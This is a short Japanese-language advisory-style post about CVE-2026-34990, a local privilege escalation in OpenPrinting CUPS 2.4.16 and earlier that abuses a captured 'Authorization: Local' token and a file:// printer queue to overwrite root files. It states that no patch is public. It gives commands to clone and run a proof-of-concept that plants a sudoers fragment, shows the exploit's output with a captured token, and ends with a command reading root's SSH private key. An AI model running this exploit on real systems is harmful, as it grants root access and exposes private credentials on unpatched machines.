
CVE-2026-34990 - OpenPrinting CUPS バージョン 2.4.16 以前において、ローカルの非特権ユーザーが cupsd を騙して、攻撃者が制御する localhost の IPP サービスに対して、再利用可能な Authorization: Local ... トークンを用いて認証させることが可能です。このトークンは localhost 上の /admin/ リクエストを実行するのに十分であり、攻撃者は CUPS-Create-Local-Printer と printer-is-shared=true を組み合わせることで、通常の FileDevice ポリシーがそのような URI を拒否するにもかかわらず、file:///... キューを永続化させることができます。そのキューに印刷することで、任意の root ファイル上書きが可能となり、以下の PoC ではこのプリミティブを利用して sudoers フラグメントを配置し、root コマンド実行を実証します。公開時点では、公開されているパッチはありません。
git clone https://github.com/ungabunga-ctf/CVE-2026-34990
cd CVE-2026-34990
python3 CVE-2026-34990.py
python3 CVE-2026-34990.py
CVE-2026-34990 CUPS PoC
[*] Target file: /etc/sudoers.d/aporter
[*] Starting token capture server...
[+] Captured Local token: 7BD0ECC9D367025E50774E0BB08F7B5E
[*] Creating file:// printer...
[+] Vulnerable!
...
...
その後:
sudo -n cat /root/.ssh/id_rsa